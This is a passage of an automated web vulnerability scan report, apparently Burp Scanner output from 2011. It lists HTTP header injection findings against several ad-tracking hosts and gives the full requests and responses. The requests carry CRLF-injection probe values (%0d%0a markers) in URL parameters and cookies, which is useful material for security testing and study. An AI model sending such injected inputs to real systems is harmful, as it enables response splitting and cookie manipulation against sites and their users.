;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=59
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',29b5a
c4af
...[SNIP]...

1.45. http://dw.com.com/clear/c.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcbbe%0d%0a18ae7dfebfb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/fcbbe%0d%0a18ae7dfebfb?ptid=8301&onid=503544&asid=20031629&astid=28&x_breadcrumb=250%3A503544&ts=1297647365150&sid=162&ld=www.cbsnews.com&oid=8301-503544_162-20031629&brflv=10.2.154&brwinsz=1112x1010&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&srcUrl=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20031629-503544.html&title=Mitch%20Daniels%3A%20Debt%20is%20the%20New%20%22Red%20Menace%22%20-%20Political%20Hotsheet%20-%20CBS%20News HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.cbsnews.com/clear/fcbbe
18ae7dfebfb
?ts=1297647425497435&clgf=Cg5iVU0qL2O/AAAAdRw
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif


1.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://live.activeconversion.com
Path:   /webtracker/track2.html

Issue detail

The value of the avc request parameter is copied into the Set-Cookie response header. The payload 6ab95%0d%0af1c7ac10bc3 was submitted in the avc parameter. This caused a response containing an injected HTTP header.

Request

GET /webtracker/track2.html?method=track&pid=30120&uclkt=1&alh=http%3A//mzima.net/&avc=6ab95%0d%0af1c7ac10bc3&source=&keyword=&ref=&pageTitle=PacketExchange%20-%20MZIMA%20-%20Global%20IP%20/%20Internet%20bandwidth%2C%20Peering%2C%20Content%20Delivery%20/%20CDN%2C%20Ethernet%20Private%20Line%20and%20Colocation%20/%20Datacenter%20Services&pageUrl=http%3A%2F%2Fmzima.net%2F&java=1&amcs=0.44739386485889554 HTTP/1.1
Host: live.activeconversion.com
Proxy-Connection: keep-alive
Referer: http://mzima.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _wt_31021=1296942871924|f64d-6178-34ed-5f2e12df7d201ca|0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:37:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B277C118513B36E9839C0F3995AFC9C6; Path=/webtracker
Set-Cookie: _wt_30120="1297694251289|6ab95
f1c7ac10bc3
|0"; Max-Age=630720000;Path=/; HttpOnly
P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM"
Connection: close
Content-Type: image/png
Content-Length: 68

.PNG
.
...IHDR.....................IDATx.c`...............IEND.B`.

1.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload af142%0d%0ac17363f719d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=12327&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5af142%0d%0ac17363f719d; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:29 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252249|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647449^1297649249|12327^1297647449^1297649249; path=/; expires=Mon, 14-Feb-11 02:07:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5af142
c17363f719d
,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

1.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload a3bf5%0d%0af4a1b2b0c20 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=a3bf5%0d%0af4a1b2b0c20&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:28 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:28 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252248|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647448^1297649248|a3bf5
f4a1b2b0c20
^1297647448^1297649248; path=/; expires=Mon, 14-Feb-11 02:07:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

1.49. http://w55c.net/m.gif [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w55c.net
Path:   /m.gif

Issue detail

The value of the rurl request parameter is copied into the Location response header. The payload a0486%0d%0a6392edd76fb was submitted in the rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /m.gif?rurl=a0486%0d%0a6392edd76fb HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; matchadmeld=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 302 Found
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Location: http://a0486
6392edd76fb

Content-Length: 0
Date: Mon, 14 Feb 2011 01:34:34 GMT
Server: w55c.net

